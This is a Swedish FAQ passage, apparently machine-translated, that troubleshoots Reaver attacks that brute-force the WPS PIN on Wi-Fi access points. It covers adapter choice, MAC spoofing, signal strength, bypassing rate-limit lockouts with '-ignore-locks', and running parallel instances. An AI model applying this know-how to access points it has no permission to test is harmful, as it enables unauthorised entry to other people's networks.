Svar: Innan du experimenterar måste du se till att den trådlösa adaptern kan fungera i övervakningsläge. Det bästa sättet är att kontrollera listan över hårdvara som stöds på Aircrack-ng-projektets webbplats. Om frågan uppstår om vad trådlös modul köp, då kan du börja med valfri adapter baserad på RTL8187L-chipset. USB-donglar kan lätt hittas på Internet för $20.

Fråga: Varför får jag "timeout" och "out of order"-fel?

Svar: Detta sker oftast pga låg nivå signal och dålig anslutning till åtkomstpunkten. Dessutom kan åtkomstpunkten tillfälligt blockera användningen av WPS.

Fråga: Varför fungerar inte MAC-adresspoofing för mig?

Svar: Du kanske spoofar MAC virtuellt gränssnitt mon0, men det här kommer inte att fungera. Du måste ange namnet på det verkliga gränssnittet, till exempel wlan0.

Fråga: Varför dålig signal Fungerar Reaver dåligt, även om samma WEP-hackning fungerar bra?

Svar: WEP-krackning sker vanligtvis genom att återsända infångade paket för att erhålla fler initialiseringsvektorer (IV) som behövs för en framgångsrik crack. I det här fallet spelar det ingen roll om något paket har förlorats eller på något sätt skadats på vägen. Men för att attackera WPS måste du strikt följa paketöverföringsprotokollet mellan åtkomstpunkten och Reaver för att kontrollera varje PIN-kod. Och om samtidigt något paket försvinner eller anländer i en oanständig form, måste du återupprätta WPS-sessionen. Detta gör attacker på WPS mycket mer beroende av signalstyrkan. Det är också viktigt att komma ihåg att bara för att din trådlösa adapter ser en åtkomstpunkt betyder det inte att åtkomstpunkten ser dig. Så om du är den lyckliga ägaren till en högeffektsadapter från ALFA Network och en antenn på ett par tiotals dBi, förvänta dig inte att kunna bryta alla fångade accesspunkter.

Fråga: Reaver skickar alltid samma PIN-kod till åtkomstpunkten, vad är det?

Svar: Kontrollera om WPS är aktiverat på routern. Detta kan göras med hjälp av tvättverktyget: kör det och kontrollera att ditt mål finns i listan.

Fråga: Varför kan jag inte associera med en åtkomstpunkt?

Svar: Detta kan bero på dålig nivå signal eller för att din adapter är olämplig för sådan forskning.

Fråga: Varför får jag hela tiden "hastighetsbegränsning upptäckt"-fel? Svar: Detta beror på att åtkomstpunkten har blockerat WPS. Vanligtvis är detta en tillfällig blockering (cirka fem minuter), men i vissa fall kan de införa ett permanent förbud (avblockering endast via den administrativa panelen). Det finns en obehaglig bugg i Reaver version 1.3, på grund av vilken borttagning av sådana lås inte upptäcks. Som en lösning föreslår de att du använder alternativet "-ignore-locks" eller laddar ner den senaste versionen från SVN.

Fråga: Kan jag köra två eller flera instanser av Reaver samtidigt för att påskynda min attack?

Svar: Teoretiskt är det möjligt, men om de hamrar på samma åtkomstpunkt är det osannolikt att sökhastigheten ökar, eftersom I detta fall det begränsas av den svaga hårdvaran i åtkomstpunkten, som redan är fulladdad även med en angripare.







2024 gtavrl.ru.